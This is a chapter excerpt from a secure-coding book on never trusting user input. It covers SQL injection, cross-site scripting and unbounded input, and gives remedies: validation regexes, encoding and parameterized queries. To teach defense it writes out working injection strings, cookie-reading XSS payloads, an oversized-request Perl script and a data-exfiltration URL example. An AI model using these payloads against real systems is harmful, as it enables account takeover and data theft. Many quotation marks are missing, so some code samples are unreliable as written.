Never Trust User Input | Writing Secure Code, Second Edition

Never Trust User Input!

I know this injunction sounds harsh, as if people are out to get you. But many are. If you accept input from users, either directly or indirectly, it is imperative that you validate the input before using it, because people will try to make your application fail by tweaking the input to represent invalid data. The first golden rule of user input is, All input is bad until proven otherwise. Typically, the moment you forget this rule is the moment you are attacked. In this section, we ll focus on the many ways developers read input, how developers use the input, and how attackers try to trip up your application by manipulating the input.

Let me introduce you to the second golden rule of user input: Data must be validated as it crosses the boundary between untrusted and trusted environments. By definition, trusted data is data you or an entity you explicitly trust has complete control over; untrusted data refers to everything else. In short, any data submitted by a user is initially untrusted data. The reason I bring this up is many developers balk at checking input because they are positive that the data is checked by some other function that eventually calls their application, and they don t want to take the performance hit of validating the data. But what happens if the input comes from a source that is not checked, or the code you depend on is changed because it assumes some other code performs a validity check?


	A somewhat related question is, what happens if an honest user simply makes an input mistake that causes your application to fail? Keep this in mind when I discuss some potential vulnerabilities and exploits.

I once reviewed a security product that had a security flaw because a small chance existed that invalid user input would cause a buffer overrun and stop the product s Web service. The development team claimed that it could not check all the input because of potential performance problems. On closer examination, I found that not only was the application a critical network component and hence the potential damage from an exploit was immense but also it performed many time-intensive and CPU-intensive operations, including public-key encryption, heavy disk I/O, and authentication. I doubted much that a half dozen lines of input-checking code would lead to a performance problem. As it turned out, the code did indeed cause no performance problems, and the code was rectified.


	Performance is rarely a problem when checking user input. Even if it is, no system is less reliably responsive than a hacked system.

Hopefully, by now, you understand that all input is suspicious until proven otherwise, and your application should validate direct user input before it uses it. Let s look at some strategies for handling hostile input.


	If you still don t believe all input should be treated as unclean, I suggest you randomly choose any 10 past vulnerabilities. You ll find that in the majority of cases the exploit relies on malicious input. I guarantee it!

User Input Vulnerabilities

Virtually all Web applications perform some action based on user requests. Let s be honest: a Web-based service that doesn t take user input is probably worthless! Remember that you should determine what is valid data and reject all other input. Let s look at an example, which is based on some Active Server Pages (ASP) code from a Web site that recommended Web site designers use the following JScript code in their ASP-based applications to implement forms-based authentication:

// Get the username and password from the form. if (isValidUserAndPwd(Request.form( name ), Request.form( pwd ))) { Response.write( Authenticated! ); } else { Response.write( Access Denied ); } function isValidUserAndPwd(strName, strPwd) { var fValid = false; var oConn = new ActiveXObject( ADODB.Connection ); oConn.Open( Data Source=c:\\auth\\auth.mdb; ); var strSQL = SELECT count(*) FROM client WHERE + name= + strName + + and pwd= + strPwd + "; var oRS = new ActiveXObject( ADODB.RecordSet ); oRS.Open(strSQL, oConn); fValid = (oRS(0).Value > 0) ? true : false; oRS.Close(); delete oRS; oConn.Close(); delete oConn; return fValid; }

Below is the client code used to send the username and password to the JScript code by using an HTTP POST:

<FORM ACTION="Logon.asp METHOD=POST> <INPUT TYPE=text MAXLENGTH=32 NAME=name> <INPUT TYPE=password MAXLENGTH=32 NAME=pwd> <INPUT TYPE=submit NAME=submit VALUE="Logon"> </FORM>

An explanation of this code is in order. The user enters a username and a password by using the HTML form shown above and then clicks the Logon button. The ASP code takes the username and password from the form and builds a SQL statement based on the user s data to query a database. If the number of rows returned by the query is greater than zero SELECT count(*) returns the number of rows returned by the SQL query the username and password combination are valid and the user is allowed to log on to the system.

Both the client and server code are hopelessly flawed, however, because the solution takes direct user input and uses it to access a database without checking whether the input is valid. In other words, data is transferred from an untrusted source a user to a trusted source, the SQL database under application control.

Let s assume a nonmalicious user enters his name, Blake, and password $qu1r+, which builds the following SQL statement:

SELECT count(*) FROM client WHERE name= Blake AND pwd= $qu1r+

If this is a valid username and password combination, count(*) returns a value of at least 1 and allows the user access to the system. The query could potentially return more than 1 if two users exist with the same username and password or if an administrative error leads to the data being entered twice.

Now let s turn our attention to what a bad guy might do to compromise the system. Because the username and password are unchecked by the ASP application, the attacker can send any input. We ll look at this as a series of mistakes and then determine how to remedy the errors.

Mistake #1: Trusting the User

You should never trust user input directly, especially if the user input is anonymous. Remember the two golden rules: never trust user input, and always check data as it moves from an untrusted to a trusted domain.

A malicious user input scenario to be wary of is that of your application taking user input and using the input to create output for other users. For example, consider the security ramifications if you build a Web service that allows users to create and post product reviews for other users of the system to read prior to making a product purchase. Imagine that an attacker does not like Product_A but likes Product_B. The attacker creates a comment about Product_A, which will appear on the Product_A Web page, along with all the other reviews. However, the comment is this:

<meta http-equiv= refresh content= 2;URL=http://www.northwindtraders.com/productb.aspx >

This HTML code will send the user s browser to the product page for Product_B after the browser has spent two seconds at the page for Product_A!

Cross-site scripting

Another variation of this attack is the cross-site scripting attack. Once again, trust of user input is at fault, but in this case an attacker sends a link in e-mail to a user or otherwise points the user to a link to a Web site, and a malicious payload is in the query string embedded in the URL. The attack is particularly bad if the Web site creates an error message with the embedded query string as part of the error text.

Let s look at a fictitious example. A Web service allows you to view remote documents by including the document name in the query string. For example,

http://servername/view.asp?file=filename

An attacker sends the following URL in e-mail probably by using SMTP spoofing to disguise the attacker s identity to an unsuspecting victim:

http://servername/view.asp?file= <script>x=document.cookie;alert ( Cookie%20"%20%2b%20x);</script>

Note the use of %nn characters; these are hexadecimal escape sequences for ASCII characters and are explained later in this chapter. For the moment, all you need to know is %20 is a space, and %2b is a plus (+) symbol. The reason for using the escapes is to remove any spaces and certain special characters from the query string so that it s correctly parsed by the server.

When the victim clicks the URL, the Web server attempts to access the file in the query string, which is not a file at all but JScript code. The server can t find the file, so it sends an error to the user to that effect. However, it also includes the name of the file that could not be found in the error message. The script that makes up the filename is then executed by the user s browser. You can do some serious damage with small amounts of JScript!

With cross-site scripting, cookies can be read; browser plug-ins or native code can be instantiated and scripted with untrusted data; and user input can be intercepted. Any Web browser supporting scripting is potentially vulnerable, as is any Web server that supports HTML forms. Furthermore, data gathered by the malicious script can be sent back to the attacker s Web site. For example, if the script has used the Dynamic HTML (DHTML) object model to extract data from a page, it can send the data to the attacker by fetching a URL of the form http://www.northwindtraders.com/CollectData.html?data=SSN123-45-6789.


	Using SSL/TLS does not mitigate cross-site scripting issues.

This attack can be used against machines behind firewalls. Many corporate local area networks (LANs) are configured such that client machines trust servers on the LAN but do not trust servers on the outside Internet. However, a server outside a firewall can fool a client inside the firewall into believing a trusted server inside the firewall has asked the client to execute a program. All the attacker needs is the name of a Web server inside the firewall that doesn t check fields in forms for special characters. This isn t trivial to determine unless the attacker has inside knowledge, but it is possible.

Many cross-site scripting bugs were found in many products during 2000, which led to the CERT Coordination Center at Carnegie Mellon University issuing a security advisory entitled Malicious HTML Tags Embedded in Client Web Requests, warning developers of the risks of cross-site scripting. You can find out more at www.cert.org/advisories/CA-2000-02.html. A wonderful explanation of the issues is also available in Cross-Site Scripting Overview at www.microsoft.com/technet/itsolutions/security/topics/csoverv.asp.

Mistake #2: Unbounded Sizes

If the size of the client data is unbounded and unchecked, an attacker can send as much data as she wants. This could be a security issue if there exists an as-yet-unknown buffer overrun in the database code called when invoking the SQL query. On closer examination, an attacker can easily bypass the maximum username and password size restrictions imposed by the previous client HTML form code, which restricts both fields to 32 characters, simply by not using the client code. Instead, attackers write their own client code in, say, Perl, or just use a Telnet client. The following is such an example, which sends a valid HTML form to Logon.asp but sets the password and username to be 32,000 letter As.

use HTTP::Request::Common qw(POST GET); use LWP::UserAgent; $ua = LWP::UserAgent->new(); $req = POST http://www.northwindtraders.com/Logon.asp , [ pwd => A x 32000, name => A x 32000, ]; $res = $ua->request($req);

Do not rely on client-side HTML security checks in this case, by thinking that the username and password lengths are restricted to 32 characters because an attacker can always bypass such controls by bypassing the client altogether.

Mistake #3: Using Direct User Input in SQL Statements

This scenario is a little more insidious. Because the input is untrusted and has not been checked for validity, an attacker could change the semantics of the SQL statement. In the following example, the attacker enters a completely invalid name and password, both of which are b' or '1' = '1, which builds the following valid SQL statement:

SELECT count(*) FROM client WHERE name= b or 1 = 1 and pwd= b or 1 = 1

Look closely and you ll see that this statement will always return a row count value of greater than one, because the '1' = '1' fragment is true on both sides of the and clause. The attacker is authenticated without knowing a valid username or password he simply entered some input that changed the way the SQL query works.

Here s another variation: if the attacker knows a username and wants to spoof that user account, he can do this using SQL comments for example, two hyphens (--) in Microsoft SQL Server or the hash sign (#) in mySQL. Some other databases use the semicolon (;) as the comment symbol. Rather than entering b' or '1' = '1, the attacker enters Cheryl' --, which builds up the following legal SQL statement:

SELECT count(*) FROM client WHERE name= Cheryl --and pwd=

If a user named Cheryl is defined in the system, the attacker can log in because he has commented out the rest of the SQL statement, which evaluates the password, so that the password is not checked!

The types of attacks open to an assailant don t stop there allow me to show you one more scenario, and then I ll focus on solutions for the issues we ve examined.

SQL statements can be joined. For example, the following SQL is valid:

SELECT * from client INSERT into client VALUES ( me , URHacked )

This single line is actually two SQL statements. The first selects all rows from the client table, and the second inserts a new row into the same table.


	One of the reasons the INSERT statement might work for an attacker is because most people connect to SQL databases by using elevated accounts, such as the sysadmin account (sa) in SQL Server. This is yet another reason to use least-privilege principles when designing Web applications.

An attacker could use this login ASP page and enter a username of b' INSERT INTO client VALUES ('me', 'URHacked') --, which would build the following SQL:

SELECT count(*) FROM client WHERE name= b INSERT INTO client VALUES ( me , URHacked ) --and pwd=

Once again, the password is not checked, because that part of the query is commented out. Worse, the attacker has added a new row containing me as a username and URHacked as the password now the attacker can log in using me and URHacked!


	A wonderful example of this kind of exploit against AdCycle, an advertising management software package that uses the mySQL database was discovered in July 2001. Any user can become the administrator of an AdCycle system by taking advantage of this kind of vulnerability. More information is available at qdefense.com/Advisories/QDAV-2001-7-2.html.

Enough bad news let s look at remedies!

User Input Remedies

As with all user input issues, the first rule is to determine which input is valid and to reject all other input. (Have I said that enough times?) Other not-so-paranoid options exist and offer more functionality with potentially less security. I ll discuss some of these also.

A Simple and Safe Approach: Be Hardcore About Valid Input

In the cases of the Web-based form and SQL examples earlier, the valid characters for a username can be easily restricted to a small set of valid characters, such as A-Za-z0-9. The following server-side JScript snippet shows how to construct and use a regular expression to parse the username at the server:

// Determine whether username is valid. // Valid format is 1 to 32 alphanumeric characters. var reg = /^[A-Za-z0-9]{1,32}$/g; if (reg.test(Request.form( name )) > 0) { // Cool! Username is valid. } else { // Not cool! Username is invalid. }


	Note the use of the g option at the end of the expression just shown. This is the global option that forces the regular expression to check all input for the pattern; otherwise, it checks the first line only. Not setting the global option can have serious consequences if the attacker can force the input to span multiple lines.

Not only does this regular expression restrict the username to a small subset of characters, but also it makes sure the string is between 1 and 32 characters long. If you make decisions about user input in COM components written in Microsoft Visual Basic or C++, you should read Chapter 8, Canonical Representation Issues, to learn how to perform regular expressions in other languages.


	Note the use of ^ and $ in the regular expression these signify that all characters from the start (^) to the end ($) of the input must match this regular expression. Otherwise, the regular expression might match only a subset of the string. For example, /[A-Za-z0-9]{1,32}/ would only match any portion of the input string. And HTML tags or script, such as <script>alert("hi!")</script>, would match because the word script matches the expression.

Your code should apply a regular expression to all input, whether it is part of a form, an HTTP header, or a query string.

In the case of the filename passed to the Web server as a query string, the following regular expression, which represents a valid filename note that this does not allow for directories or drive letters! would stamp out any attempt to use script as part of the query string:

// Determine whether filename is valid. // Valid format is 1 to 24 alphanumeric characters // followed by a period, and 1 to 3 alpha characters. var reg = /^[A-Za-z0-9]{1,24}\.[A-Za-z]{1,3}$/g; if (reg.test(Request.Querystring( file )) > 0) { // Cool! Valid filename. } else { // Not cool! Invalid filename. }

Not being strict is dangerous

A common mistake made by many Web developers is to allow safe HTML constructs for example, allowing a user to send <IMG> or <TABLE> tags to the Web application. Then the user can send HTML tags but nothing else, other than plaintext. Do not do this. A cross-site scripting danger still exists because the attacker can embed script in some of these tags. Here are some examples:

<img src=javascript:alert(document.domain)>
<link rel=stylesheet href="javascript:alert(document.domain)">
<input type=image src=javascript:alert(document.domain)>
<bgsound src=javascript:alert(document.domain)>
<iframe src="/books/1/290/1/html/2/javascript:alert(document.domain)">
<frameset onload=vbscript:msgbox(document.cookie)></frameset>
<table background="javascript:alert(document.domain)"></table>
<object type=text/html data="javascript:alert(document.domain);"></object>
<body onload="javascript:alert(document.cookie)"></body>
<body background="javascript:alert(document.cookie)"></body>
<p style=left:expression(alert(document.cookie))>

Let s say you want to allow a small subset of HTML tags so that your users can add some formatting to their comments. Allowing tags like <I> </I> and <B> </B> is safe, so long as the regular expression looks for these character sequences explicitly. The following regular expression will allow these tags, as well as other safe characters:

var reg = /^(?:[\s\w\?\.\,\!\$]+ (?:\<\/?[ib]\>))+$/gi; if (reg.test(strText) > 0) { // Cool! Valid input. } else { // Not cool! Invalid input. }

This regular expression will allow spaces (\s), A-Za-z0-9 and _ (\w), a limited subset of punctuation and < followed by an optional /, and the letter i or b followed by a >. The i at the end of the expression makes the check case-insensitive. Note that this regular expression does not validate the input is well-formed HTML. For example, Hello, </i>World!<i> is legal input to the regular expression, but it is not well-formed HTML even though the tags are not malicious.

So you think you re safe?

Another mistake I ve seen involves converting all input to uppercase to thwart JScript attacks, because JScript is primarily lowercase and case-sensitive. And what if the attacker uses Visual Basic Scripting Edition (VBScript), which is case-insensitive, instead? Don t think that stripping single or double quotes will help either many script and HTML constructs take arguments without quotes.

In summary, you should be strict about what is valid user input, and make sure the regular expression does not allow HTML in the input, especially if the input might become output for other users.

Special Care of Passwords

You could potentially use regular expressions to restrict passwords to a limited subset of valid characters. But doing so is problematic because you need to allow complex passwords, which means allowing many nonalphanumeric characters. A naive approach is to use the same regular expression defined earlier but restrict the valid character list to A-Za-z0-9 and a series of punctuation characters you know are safe. This requires you understand all the special characters used by your database or used by the shell if you re passing the data to another process. Even worse, you might disallow certain characters, such as the character, but allow the % character and numerals, in which case the attacker can escape the character by using a hexadecimal escape, %7c, which is a valid series of characters in the regular expression.

One way of handling passwords is not to use the password directly; instead, you could base64-encode or hash the password prior to passing the password to the query. The former is reversible, which means that if the Web application requires the plaintext password for some other task, it can un-base64 the password held in the database. However, if you do not need to use the password other than to authenticate the incoming client authentication attempt, you can simply hash the password and compare the hash stored in the database. The positive side effect of this approach is that the attacker has access only to the password hash and not to the password itself if the authentication database is compromised. Refer to Chapter 7 for more information about this process.


	If you hash passwords, you should also salt the hashes, so in case more than one user has the same password, the password will be resilient to dictionary attacks. Refer to Chapter 7 for more information regarding salting data.

The preferred approach is to use the Web server s capabilities to encode the password. In the case of ASP, you can use the Server.URLEncode method to encode the password, and you can use HttpServerUtility.URLEncode in ASP.NET. URLEncode applies various rules to convert nonalphanumeric characters to hexadecimal equivalents. For example, the password ' 2Z.81h\/^-$%' becomes %272Z%2E81h%5C%2F%5E%2D%24%25. The password has the same effective strength in both cases you incur no password entropy loss when performing the encoding operation.


	Encoding is not encryption!

What s really cool about URLEncode is that it caters to UTF-8 characters also, so long as the Web page can process UTF-8 characters. For example, the following nonsense French phrase G n ral la Fran ois becomes G%C3%A9n%C3%A9ral+%C3%A0+la+Fran%C3%A7ois. You can force an ASP page to use UTF-8 data by setting Session.Codepage=65001 at the start of the ASP page or by using the HttpSessionState.CodePage property in ASP.NET.

Do not give up if your application does not have access to the CodePage property or the URLEncode method. You have five options. The first is to use the UrlEscape function exported by Shlwapi.dll. The second is to use CoInternetParseUrl exported by Urlmon.dll. The third is to use InternetCanonicalizeUrl exported by Wininet.dll. You can also use the ATL Server CUrl::Canonicalize method defined in Atlutil.h. If your application uses JScript, you can use the escape and unescape functions to encode and decode the string.

Note that UrlEscape and CoInternetParseUrl should be called from client applications only, and it s recommended that you check each function or method before using it to verify it has the appropriate options and capabilities for your application.


	All the URL encoding functions explained in this section are not encoding URLs. They are encoding arbitrary passwords by using URL encoding techniques the password is not passed in the URL!

When Input Becomes Output

In the case of allowing users to post reviews, or in any situation in which you gather user input and use the input to create output for other users, you should be highly restrictive. For example, very few Web sites require a message to contain more than A-Za-z0-9 and a limited subset of punctuation, including whitespace, quotes, and the characters .,!? . You can achieve this with the following regular expression sample written using Visual Basic Script:

Set reg = New RegExp reg.Pattern = ^[A-Za-z0-9\s\.\,\!\?\ \"]+$" reg.Global = True If reg.Test(strPostedMessage) = True Then Input is valid. else Input is invalid. End If

Another option is to encode the input data before displaying it. Luckily, this is simple to achieve using the ASP Server.HTMLEncode method or the ASP.NET HttpServerUtility.HTMLEncode method. These methods will convert dangerous symbols, including HTML tags, to their HTML representation for example, < becomes <.

Building SQL Statements Securely

Building SQL strings in code is problematic, as demonstrated earlier in this chapter. A simple way to remedy this is to leave the completion of the SQL string to the database and to not attempt the SQL string construction in your code. You can do this in two ways. The first is to pass the user s input to a stored procedure (SP), assuming the database supports SPs. SQL Server supports SPs, as do many other server-based databases, such as Oracle and IBM s DB2. Flat-file databases, such as Microsoft Access and Microsoft FoxPro, do not support stored procedures. Actually, that s not quite correct: both Access and FoxPro can connect to server-based databases to take some advantage of stored procedures.

The previous SQL example can be replaced with the SQL Server SP that follows.

CREATE PROCEDURE IsValid @uname varchar(32), @pwd varchar(32) AS SELECT count(*) FROM client WHERE @uname = name AND @pwd = pwd GO

And the ASP code becomes

 var strSQL = IsValid + strName + , + strPwd + " var oRS = new ActiveXObject( ADODB.RecordSet ); oRS.Open (strSQL, oConn); fValid = (oRS(0).Value > 0) ? true : false;

Another way to perform this kind of processing is to use placeholders, which are often referred to as parameterized commands. When you define the query, you determine which parts of the SQL statement are the parameters. For example, the following is the parameterized version of the authentication SQL string defined previously:

SELECT count(*) FROM client WHERE name=? AND pwd=?

Next, we need to define what the parameters are; these are passed along with the skeletal SQL query to the SQL database for processing. The following VBScript function outlines how to use SQL placeholders:

Function IsValidUserAndPwd(strName, strPwd) Note I am using a trusted connection to SQL Server. Never use uid=sa;pwd= !! strConn = Provider=sqloledb; + _ Server=server-sql; + _ database=client; + _ trusted_connection=yes" Set cn = CreateObject( ADODB.Connection ) cn.Open strConn Set cmd = CreateObject( ADODB.Command ) cmd.ActiveConnection = cn cmd.CommandText = _ select count(*) from client where name=? and pwd=?" cmd.CommandType = 1 1 means adCmdText cmd.Prepared = true Explanation of numeric parameters: data type is 200, varchar string; direction is 1, input parameter only; size of data is 32 chars max. Set parm1 = cmd.CreateParameter( name", 200, 1, 32, ) cmd.Parameters.Append parm1 parm1.Value = strName Set parm2 = cmd.CreateParameter( pwd", 200, 1, 32, ) cmd.Parameters.Append parm2 parm2.Value = strPwd Set rs = cmd.Execute IsValidUserAndPwd = false If rs(0).value = 1 Then IsValidUserAndPwd = true rs.Close cn.Close End Function

Additionally, parameterized queries and stored procedures are faster than hand crafting the SQL query in code. It s not often you find an approach that s both more secure and faster!

One prime benefit of using parameters is that you can define the parameter data type. For example, if you define a numeric parameter, the strong type checking will thwart most attacks because a SQL-based attack cannot be made purely from numbers. Look at Table 12-1 for some examples of data types.

Table 12-1 A Data Type Rosetta Stone
ADO Constant	OLE-DB Constant	SQL Server Type	Value	Comments
adBigInt	DBTYPE_I8	bigint	20	Eight-byte signed integer
adChar	DBTYPE_STR	char	129	A string
adCurrency	DBTYPE_CY	smallmoney and money	6	Currency value
adDate	DBTYPE_DATE	None; treated as a char	7	Date value stored as a double
adDBTimeStamp	DBTYPE_DBTIMESTAMP	smalldatetime	135	Date value in yyyymmddhhmmss form
adDouble	DBTYPE_R8	float	5	Double-precision floating-point number
adEmpty	DBTYPE_EMPTY	Any SQL data type can be NULL	0	No value
adGUID	DBTYPE_GUID	uniqueidentifier	72	A globally unique identifier
adInteger	DBTYPE_I4	int	3	Four-byte signed integer
adVarChar	DBTYPE_STR	varchar	200	A variable-length, null-terminated character string
adWChar	DBTYPE_WSTR	nchar	130	A null-terminated Unicode character string
adBoolean	DBTYPE_BOOL	bit	11	A Boolean: True (nonzero) or False (zero)

If your Web application uses open database connectivity (ODBC) and you want to use parameters, you need to use the SQLNumParams and SQLBindParam functions. If you use OLE DB, you can use the ICommandWithParameters interface.